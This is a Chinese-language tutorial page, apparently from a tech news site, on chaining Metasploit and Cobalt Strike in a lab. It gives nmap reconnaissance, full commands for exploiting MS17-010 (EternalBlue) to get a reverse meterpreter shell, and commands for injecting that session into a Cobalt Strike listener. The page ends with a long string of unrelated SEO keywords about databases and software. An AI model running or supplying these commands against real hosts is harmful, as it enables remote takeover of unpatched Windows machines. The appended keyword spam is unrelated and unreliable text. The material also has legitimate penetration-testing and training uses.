千家信息网

如何进行MSF和CobaltStrike联动

发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,本篇文章为大家展示了如何进行MSF和CobaltStrike联动,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x00环境介绍攻击机:192.168.60.1
千家信息网最后更新 2025年01月21日如何进行MSF和CobaltStrike联动

本篇文章为大家展示了如何进行MSF和CobaltStrike联动,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x00环境介绍

攻击机:192.168.60.129 (kali)

受害机:192.168.60.131

网关:192.168.60.2

工具:nmap、metaspolit、cobaltstrike

0x01攻击准备

首先部署受害主机调制网卡可以互相通信。

接下来部署web应用服务,搞的看起来像是真实的应用服务器一样哈

0x02前攻击阶段

通过使用nmap信息收集发现开放端口445、3389及操作系统版本信息。

nmap -A 192.168.60.131

通过信息收集发现系统开放445端口,使用工具检测是否存在ms17_010漏洞,发现存在。

接近着神器1 Metaspolit上场

首先打开msf,进行漏洞利用

1.搜索利用漏洞模块

search ms17_010

2.漏洞利用

use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/reverse_tcpset RHOST 192.168.60.131set LHOST 192.168.60.129

获得session

进入meterpreter会话。

接近着神器2Cobaltstrike上场

如果觉得功能太少,也可以和Cobaltstrike联动

启动Cobaltstrike

现在获得是一个MSF的meterpreter类型的session,且session id为1

在Cobaltstrike新建一个监听,配置如下:

在MSF中设置如下

use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset DisablePayloadHandler trueset lhost 192.168.60.129set lport 12388set session 1

exploit

这样就可以看到在Cobaltstrike中获取到了了MSF弹回的Meterpreter会话。

最后可以使用Cobaltstrike中集成的渗透模块进行进一步的测试。

注:只有Meterpreter类型的session才能派生给Cobaltstrike。

上述内容就是如何进行MSF和CobaltStrike联动,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

漏洞 信息 攻击 内容 工具 技能 模块 知识 神器 端口 类型 系统 应用 开放 服务 了了 简明 接下来 操作系统 简明扼要 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 sql数据库要哪些服务 网络安全中国节.中秋手抄报 带光电隔离的服务器有哪些 江西电力守时模块服务器 旅游信息数据库项目创新特色 科技互联网有些什么上市公司 典型的客户服务器两层架构 宁德企业管理软件开发公司 互联网电子科技股份 惠普服务器磁盘管理 软件开发 开发流程 武汉在线内训软件开发 万方数据库打不开文章 数据库软件主目录已注册到产品清单中 关于数据库管理系统的论文 阳光网络安全 梦幻服务器等级 软件开发网络推广属于哪个行业 首都新时代网络安全 经济学不同数据库数据不一样 剑网3服务器屏蔽多久能回复 网络安全教育篇视频 隧道工程网络安全建设问题 软件开发创造价值吗 西安科百汇网络技术有限公司 河北星捷软件开发公司图片 通信安全和网络安全的区别 海康服务器电源键按了没有反应 海曙手机软件开发工具 嘉定区企业软件开发承诺守信
0